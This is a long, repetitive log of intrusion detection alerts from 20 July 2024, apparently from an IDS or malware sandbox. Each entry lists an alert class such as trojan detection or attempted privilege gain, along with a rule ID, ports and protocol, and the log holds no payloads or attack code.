                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.368314
                      SID:2027339
                      Source Port:40808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.186863
                      SID:2025132
                      Source Port:37326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2025132
                      Source Port:44148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2027339
                      Source Port:42690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2829579
                      Source Port:44408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.610263
                      SID:2027339
                      Source Port:47978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.507640
                      SID:2831300
                      Source Port:35308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.312502
                      SID:2831300
                      Source Port:57168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.027910
                      SID:2025132
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2027339
                      Source Port:50064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:49904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.258673
                      SID:2027339
                      Source Port:49322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.392409
                      SID:2027339
                      Source Port:44516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2831300
                      Source Port:33622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2829579
                      Source Port:49572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.821008
                      SID:2829579
                      Source Port:45282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2831300
                      Source Port:50466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.215644
                      SID:2831300
                      Source Port:40762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.551203
                      SID:2831300
                      Source Port:56554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.954404
                      SID:2027339
                      Source Port:59086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462432
                      SID:2027339
                      Source Port:50042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2025132
                      Source Port:45122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.510955
                      SID:2025132
                      Source Port:44144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:28.537428
                      SID:2027339
                      Source Port:49462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:35618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2027339
                      Source Port:39274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.599614
                      SID:2025132
                      Source Port:38566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.220683
                      SID:2829579
                      Source Port:55796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2829579
                      Source Port:39132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.879670
                      SID:2027339
                      Source Port:38410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2027339
                      Source Port:43878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.454514
                      SID:2835222
                      Source Port:37692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.134757
                      SID:2025132
                      Source Port:55502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.850879
                      SID:2831300
                      Source Port:43880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.927502
                      SID:2025132
                      Source Port:38696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2831300
                      Source Port:47276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.371348
                      SID:2831300
                      Source Port:47906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.429491
                      SID:2025132
                      Source Port:36704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.763392
                      SID:2027339
                      Source Port:58792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:39178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.174966
                      SID:2027339
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.315621
                      SID:2027339
                      Source Port:37722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.735063
                      SID:2027339
                      Source Port:51098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2831300
                      Source Port:40346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.755462
                      SID:2831300
                      Source Port:46022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.955933
                      SID:2027339
                      Source Port:33746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542289
                      SID:2027339
                      Source Port:54550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2831300
                      Source Port:34052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2829579
                      Source Port:44328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.286385
                      SID:2831300
                      Source Port:36696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.755759
                      SID:2025132
                      Source Port:54828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440173
                      SID:2831300
                      Source Port:32916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.137205
                      SID:2835222
                      Source Port:42268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.066021
                      SID:2025132
                      Source Port:50124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.546878
                      SID:2027339
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.925505
                      SID:2025132
                      Source Port:50696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.584797
                      SID:2027339
                      Source Port:35520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.747656
                      SID:2835222
                      Source Port:51562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.262546
                      SID:2027339
                      Source Port:55086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620654
                      SID:2025132
                      Source Port:58234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.762937
                      SID:2025132
                      Source Port:40996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:40050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2829579
                      Source Port:52234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.895962
                      SID:2831300
                      Source Port:41294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.507185
                      SID:2831300
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.661736
                      SID:2027339
                      Source Port:55822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2829579
                      Source Port:43180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.257590
                      SID:2027339
                      Source Port:57650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2835222
                      Source Port:39896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.995248
                      SID:2025132
                      Source Port:38200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.925407
                      SID:2027339
                      Source Port:44402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.520793
                      SID:2027339
                      Source Port:56368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2829579
                      Source Port:54764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.143972
                      SID:2027339
                      Source Port:33856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.787162
                      SID:2025132
                      Source Port:53740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.738854
                      SID:2025132
                      Source Port:57688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2027339
                      Source Port:49898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.449959
                      SID:2027339
                      Source Port:45786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.344973
                      SID:2025132
                      Source Port:45966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:46274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2027339
                      Source Port:34914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.149453
                      SID:2025132
                      Source Port:60862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2831300
                      Source Port:40458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.759260
                      SID:2831300
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2025132
                      Source Port:44758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.167348
                      SID:2025132
                      Source Port:57384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2025132
                      Source Port:44298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.709620
                      SID:2027339
                      Source Port:49192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.558004
                      SID:2027339
                      Source Port:58274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323603
                      SID:2835222
                      Source Port:54890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.464393
                      SID:2025132
                      Source Port:49028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.047373
                      SID:2831300
                      Source Port:34126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.799314
                      SID:2027339
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.233806
                      SID:2835222
                      Source Port:46228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2831300
                      Source Port:51246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.096689
                      SID:2831300
                      Source Port:37516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.841574
                      SID:2027339
                      Source Port:50446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994750
                      SID:2027339
                      Source Port:55442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:36.017976
                      SID:2027339
                      Source Port:46328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.724263
                      SID:2027339
                      Source Port:38238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.612988
                      SID:2027339
                      Source Port:54776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.269499
                      SID:2831300
                      Source Port:41968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2835222
                      Source Port:60218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2027339
                      Source Port:40720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2027339
                      Source Port:42068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.910350
                      SID:2831300
                      Source Port:38290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2025132
                      Source Port:59730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.898445
                      SID:2831300
                      Source Port:51044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.654274
                      SID:2829579
                      Source Port:52518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:51460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.611308
                      SID:2829579
                      Source Port:46892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.193739
                      SID:2027339
                      Source Port:38016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2829579
                      Source Port:34316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2027339
                      Source Port:38874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2835222
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857159
                      SID:2835222
                      Source Port:56980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2831300
                      Source Port:52142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2025132
                      Source Port:52348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.282306
                      SID:2025132
                      Source Port:41200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2835222
                      Source Port:53362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.432998
                      SID:2831300
                      Source Port:39584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.339211
                      SID:2025132
                      Source Port:42680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.648191
                      SID:2025132
                      Source Port:35836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:48774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2027339
                      Source Port:50770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2831300
                      Source Port:45906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.631877
                      SID:2835222
                      Source Port:50168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:46.927906
                      SID:2829579
                      Source Port:59510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.035971
                      SID:2831300
                      Source Port:56224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:33732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:59796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2829579
                      Source Port:58160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2831300
                      Source Port:50104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.483839
                      SID:2027339
                      Source Port:41794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.871750
                      SID:2025132
                      Source Port:35856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:42458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.280739
                      SID:2025132
                      Source Port:49716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.374852
                      SID:2025132
                      Source Port:42820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.188540
                      SID:2025132
                      Source Port:55586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.745128
                      SID:2831300
                      Source Port:47388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.373997
                      SID:2027339
                      Source Port:34426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.508603
                      SID:2027339
                      Source Port:57704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.070537
                      SID:2027339
                      Source Port:35120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2835222
                      Source Port:58152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.452299
                      SID:2831300
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2831300
                      Source Port:38532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.672264
                      SID:2025132
                      Source Port:46058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.550859
                      SID:2831300
                      Source Port:39608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2829579
                      Source Port:56916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.575004
                      SID:2027339
                      Source Port:38174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.144593
                      SID:2027339
                      Source Port:58888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.361374
                      SID:2025132
                      Source Port:43232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:11.843007
                      SID:2027339
                      Source Port:38292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.919151
                      SID:2025132
                      Source Port:39182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.368314
                      SID:2027339
                      Source Port:55654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.420819
                      SID:2831300
                      Source Port:36160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.101730
                      SID:2835222
                      Source Port:58884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:54408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.001861
                      SID:2027339
                      Source Port:34224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2829579
                      Source Port:60860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.756534
                      SID:2025132
                      Source Port:45682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.118554
                      SID:2025132
                      Source Port:58398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2829579
                      Source Port:55744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.152960
                      SID:2831300
                      Source Port:37172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2027339
                      Source Port:33634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2027339
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:46.064783
                      SID:2025132
                      Source Port:54136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.372966
                      SID:2027339
                      Source Port:37584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.843007
                      SID:2829579
                      Source Port:36506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.032317
                      SID:2027339
                      Source Port:34470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.604858
                      SID:2027339
                      Source Port:55672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2831300
                      Source Port:59240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.004179
                      SID:2027339
                      Source Port:33846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2027339
                      Source Port:60088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:51348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.582127
                      SID:2025132
                      Source Port:60746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.807124
                      SID:2835222
                      Source Port:43254
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:33352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.867960
                      SID:2025132
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.487250
                      SID:2027339
                      Source Port:55308
